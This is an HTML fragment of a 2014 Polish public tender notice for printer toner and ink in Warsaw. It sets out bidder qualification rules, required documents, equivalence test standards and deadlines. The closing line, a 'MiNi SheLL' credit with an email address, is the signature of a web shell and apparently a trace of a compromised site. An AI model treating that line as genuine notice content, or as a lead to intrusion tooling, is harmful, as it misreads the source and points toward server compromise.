Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
 Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 5 do wzoru formularza oferty (pkt. 9.2.1. siwz).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
 Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 5 do wzoru formularza oferty (pkt. 9.2.1. siwz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
 Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 5 do wzoru formularza oferty (pkt. 9.2.1. siwz).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. 	Wykonawca musi dołączyć do oferty w terminie wskazanym w pkt. 15. specyfikacji istotnych warunków zamówienia i w formie określonej w  specyfikacji:
             1.1. 	wypełniony i podpisany formularz oferty zgodny w treści ze wzorem stanowiącym Rozdział II specyfikacji istotnych warunków zamówienia,
1.2. formularz cenowy na załączniku nr 1 do oferty wg wzoru załączonego do wzoru formularza oferty,
1.3. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 9.5.1.2. specyfikacji, jeżeli oferty będą składali Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,
1.4. oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza pełnomocnictwa, o którym mowa w pkt. 14.7.3. specyfikacji, jeśli oferta będzie podpisana przez pełnomocnika,
1.5. 	informację o części / częściach zamówienia, które Wykonawca zamierza powierzyć podwykonawcom, o ile Wykonawca będzie realizował zamówienie z udziałem podwykonawców,
   1.6. 	informację podmiotów i o podmiotach, które będą brały udział w realizacji     części zamówienia, na zasobach, których polega wykonawca na zasadach określonych w pkt. 8.2. siwz, 
           1.7. 	informacji określonej w pkt. 16.3. specyfikacji w przypadku 	zastosowania przez wykonawcę innej stawki podatku od towarów 
	i usług niż obowiązującej w dacie składania ofert,
1.8. oświadczenia Wykonawcy oferującego materiały równoważne, że ten zobowiązuje się do zagwarantowania serwisu sprzętu i pokrycia kosztów serwisowania w autoryzowanym serwisie producenta danego sprzętu, w przypadku gdy usterka zostałaby wywołana przez stosowanie produktów równoważnych - zał. nr 6 do specyfikacji istotnych warunków zamówienia,  
2.   W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w pkt. 8 SIWZ, Wykonawca zobowiązany jest złożyć wraz z ofertą następujące dokumenty: 
2.1. oświadczenie na załączniku nr 2 do oferty wg wzoru załączonego do wzoru formularza oferty, że spełnia warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych, 
2.2. 	wykaz głównych dostaw, wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3-ch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów na rzecz których usługi zostały wykonane, potwierdzający spełnienie warunku określonego w pkt. 8.1.1. specyfikacji na załączniku nr 3 do oferty wg wzoru załączonego do wzoru formularza oferty, 
2.3. dowody dotyczące dostaw, określające czy dostawy te, (wykazane przez Wykonawcę w załączniku nr 3 do oferty -zgodnie z zapisem pkt. 8.1.1. i 9.2.2. specyfikacji istotnych warunków zamówienia) zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa w zdaniu poprzednim są: 
              a)poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
 b)oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o których mowa w pkt. a),
 W przypadku gdy Wykonawca wskazuje w wykazie usług, usługi, które wcześniej zostały wykonane na rzecz Zamawiającego, nie ma obowiązku przedkładania w/w dowodów.
UWAGA!
W okresie 12 miesięcy od daty wejścia w życie Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (tj. od dnia 20.02.2013 r.) w zakresie dokumentów określonych w poz. 9.2.5. SIWZ. dopuszcza się stosowanie dokumentów wydanych na podstawie przepisów obowiązujących przed zmianą ww. rozporządzenia.
2.4. W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            2.4.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            2.4.2.  pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           2.4.3. inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2. SIWZ.
3. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą:
3.1. 	oświadczenie na załączniku nr 4 do oferty wg wzoru załączonego do wzoru formularza oferty o braku podstaw wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo Zamówień Publicznych,  
3.2. 	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, 
3.3.  Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 8 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w pkt. 8.2. SIWZ, a podmioty te będą brały udział w realizacji części zamówienia, Wykonawca zobowiązany jest załączyć dokumenty wymienione w pkt. 9.2.4. i 9.3 i/lub 9.7. SIWZ, odnoszące się do tych podmiotów.
4. 	W celu wykazania braku podstaw do wykluczenia z postępowania  o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 2 pkt. 5  ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą: listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy pzp lub informację o braku przynależności do grupy kapitałowej - wzór druku stanowi załącznik nr 5 do oferty wg wzoru załączonego do wzoru formularza oferty.
5. DOTYCZY WYŁĄCZNIE WYKONAWCÓW OFERUJĄCYCH W POSTĘPOWANIU MATERIAŁY EKSPLOATACYJNE RÓWNOWAŻNE WOBEC ASORTYMENTU WSKAZANEGO PRZEZ ZAMAWIAJĄCEGO W PKT. 3 I ROZDZIALE IV SPECYFIKACJI: W celu potwierdzenia że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego  w SIWZ; 
5.1. opis produktów, o którym mowa w pkt. 8.4.1.  siwz, potwierdzający, że oferowane przez Wykonawcę produkty spełniają wymagania określone przez Zamawiającego i charakteryzują się porównywalną tzn. taką samą lub lepszą jakością wydruku, szybkością schnięcia, kolorystyką, pojemnością, wydajnością oraz posiadają analogiczne funkcje np. informacje o stanie zużycia wkładu. Wykonawca musi załączyć do oferty szczegółowy opis w formie tabeli porównawczej, potwierdzający, że produkt ten posiada takie same lub lepsze parametry techniczne, jakościowe i użytkowe wraz z podaniem jego nazwy producenta, kodu lub symbolu dot. każdej właściwej pozycji asortymentowej, do której produkt równoważny się odnosi,
                5.2. raporty z testów, o których mowa w pkt. 8.4.2.  siwz, potwierdzające, że podana wydajność produktu równoważnego jest wynikiem przeprowadzenia testów zgodnie z normami: ISO/IEC 19752 dla tonerów monochromatycznych, ISO/IEC 19798 dla wkładów do drukarek kolorowych i ISO/IEC 24711 dla nabojów do drukarek atramentowych, wystawionych przez niezależny podmiot posiadający stosowną akredytację w zakresie badania produktów pod kątem spełniania  powyższych norm lub zaświadczenie wydane przez niezależny podmiot posiadający stosowną akredytację w zakresie badania produktów pod potwierdzające spełnianie powyższych norm,
5.3 karty charakterystyki bezpieczeństwa materiałów eksploatacyjnych przygotowana zgodnie z wymogami Dyrektywy Unii Europejskiej 91/155/EEC wraz z poprawkami 2001/58/EC lub równoważnymi, o których mowa w pkt. 8.4.3. siwz,
5.4 certyfikat  ISO 14001 lub równoważny na proces produkcji materiałów eksploatacyjnych, pozwalający zweryfikować czy producent spełnia przepisy związane z ochroną środowiska oraz potwierdzający, że materiały są produkowane w sposób bezpieczny i niepływający negatywnie na środowisko, o którym mowa w pkt. 8.4.4.  siwz,.
5.5. oświadczenie producenta materiału eksploatacyjnego równoważnego, że oferowane kasety z tonerem i/lub tusze są materiałami fabrycznie nowymi, wolnymi od wad, kompletnymi a żaden z elementów kasety z tonerem i/lub tuszu nie jest wtórnie wykorzystany ani nie pochodzi z procesu recyklingu,  o którym mowa w pkt. 8.4.5.  siwz,
5.6. dokument potwierdzający, że oferowane materiały eksploatacyjne posiadają termin przydatności nie krótszy niż 12 miesięcy, licząc od dnia zainstalowania kasety w drukarce (niezależnie od daty zakupu i okresu przechowywania zamkniętej kasety w magazynie), o którym mowa w pkt. 8.4.6. siwz,
5.7. oświadczenia producenta materiału równoważnego, że proces produkcji i stosowanie wyprodukowanych przez niego materiałów eksploatacyjnych nie naruszy praw patentowych producentów oryginalnych tonerów, tuszy  i kaset,  o których mowa w pkt. 8.4.7. siwz,
5.8. oświadczenia Wykonawcy, że oferowane równoważne materiały eksploatacyjne nie powodują ograniczeń funkcji i możliwości sprzętu oraz jakości wydruku opisanych w warunkach technicznych producenta sprzętu (pełna kompatybilność z oprogramowaniem sprzętu: drukarki, faksu lub ksero, informowanie i liczbie wydrukowanych stron  oraz poziomie zużycia toneru/tuszu),  o którym  mowa w pkt. 8.4.8. siwz,.
6. Oferta wspólna
6.1. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 23 Ustawy) pod warunkiem, że żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy Pzp, a taka oferta spełniać będzie następujące wymagania: 
6.1.1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;
6.1.2. 	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument (np. Umowa konsorcjum, spółki cywilnej) powinien być załączony do oferty i zawierać w szczególności wskazanie: 
a)  postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)  ustanowionego Pełnomocnika oraz zakres jego umocowania;
6.1.3.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. 
6.1.4. Każdy z Wykonawców (każdy członek konsorcjum)  składających ofertę wspólną musi wykazać brak podstaw do wykluczenia z powodu niespełnienia warunków określonych w art. 24 ust. 1 i 24 ust. 2 pkt. 5 ustawy pzp. W tym celu konsorcjum składa oświadczenie, o którym mowa w pkt. 9.3.1. i 9.4. siwz podpisane przez wszystkich Wykonawców oraz dokumenty określone w pkt. 9.3.2. i/lub 9.8.1., 9.8.2. siwz  dla wszystkich Wykonawców podpisane za zgodność z oryginałem przez Wykonawców.
6.1.5. W odniesieniu do warunków określonych w art. 22 ust. 1 ustawy 
wymagania te muszą być spełnione wspólnie przez Wykonawców składających ofertę wspólną (na ich potwierdzenie należy złożyć dokumenty określone w pkt. 9.2. siwz)  z zastrzeżeniem, że oświadczenie, o którym mowa w pkt. 9.2.1. siwz podpisane przez Pełnomocnika lub wszystkich Wykonawców musi być złożone w imieniu wszystkich  Wykonawców;
6.1.6. 	W odniesieniu do listy podmiotów należących do tej samej grupy kapitałowej, każdy z uczestników oferty wspólnej indywidualnie przedstawia tę listę albo indywidualnie lub  wspólnie informację o tym, ze nie należy do grupy kapitałowej (wg Załącznika nr 5 do SIWZ).
6.1.7. 	Kopie dokumentów dotyczące Wykonawcy (członka konsorcjum) muszą być poświadczone za zgodność z oryginałem przez tego Wykonawcę, którego one dotyczą. 
6.1.8. 	Pozostałe kopie dokumentów, inne niż wymienione w pkt 14.7.4. SIWZ, muszą być poświadczone za zgodność z oryginałem przez Pełnomocnika lub wszystkich Wykonawców.
6.2. 	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty.
6.3.  Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
7. 	W przypadku złożenia oferty wspólnej Wykonawcy solidarnie odpowiadać będą za wykonanie zamówienia.
8. Dotyczy Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
         8.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.3.2. specyfikacji - składa dokument lub dokumenty wystawione 
w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
              Dokumenty, o których mowa w pkt. 9.8.1. SIWZ powinny być wystawione nie   wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
          8.2. 	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 9.8.1., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy,  złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt. 9.8.1 SIWZ odnoszące się do wymaganych terminów ważności poszczególnych dokumentów stosuje się odpowiednio. jw.
         8.3. W przypadku Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej wszystkie wykazywane przez nich w załącznikach do oferty i dokumentach wartości i kwoty w EURO będą przeliczane przez Zamawiającego w/g średniego kursu NBP na dzień upublicznienia postępowania.
9. W PRZYPADKU, GDY WYKONAWCA W MIEJSCE KTÓREGOŚ Z DOKUMENTÓW, 
O KTÓRYCH MOWA W PKT 9.2.3., 9.3.2., 9.8.1., 9.8.2., SPECYFIKACJI DOSTARCZY JEGO KOPIĘ, KOPIA TA MUSI BYĆ POŚWIADCZONA ZA ZGODNOŚĆ Z ORYGINAŁEM zgodnie z zapisem pkt. 14.7.4 specyfikacji istotnych warunków zamówienia przy czym w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z zapisem pkt. 14.7.5. siwz  Zamawiający może zażądać przedstawienia oryginałów lub notarialnie potwierdzonych kopii dokumentów np., gdy złożone  kopie dokumentów będą nieczytelne lub będą budzić wątpliwości co do ich prawdziwości.
10. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. Dokumenty i oświadczenia sporządzone w języku obcym, są składane wraz z tłumaczeniem  na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b></p>
<p>przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: http://aukcje.um.warszawa.pl</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych w specyfikacji istotnych warunków zamówienia. Zmiany, o których mowa w zdaniu pierwszym wymagają formy pisemnej pod rygorem nieważności w tym:
          1. Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a)	zmiany terminu wykonania Przedmiotu zamówienia w następstwie wydłużonych/wykraczających poza ustawowe terminy procedur administracyjnych oraz innych terminów spraw urzędowych, mających wpływ na terminy realizacji Przedmiotu zamówienia, o ile Wykonawca przy wykazaniu należytej staranności nie może dotrzymać terminu wykonania Przedmiotu zamówienia;
b)	ograniczenia środków budżetowych na realizację Przedmiotu zamówienia;
c)	zmiany zakresu rzeczowego i finansowego;
d)	zmiany osób uczestniczących w realizacji Przedmiotu zamówienia;
e)	zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania Przedmiotu zamówienia;
f)	zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy wraz ze skutkami takiej zmiany regulacji prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgnmokotow.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego przy ul. Irysowej 19 w Warszawie, pok. nr 34..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2014 godzina 10:00, miejsce: W siedzibie Zamawiającego przy ul. Irysowej 19 w Warszawie, pok. nr 34..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com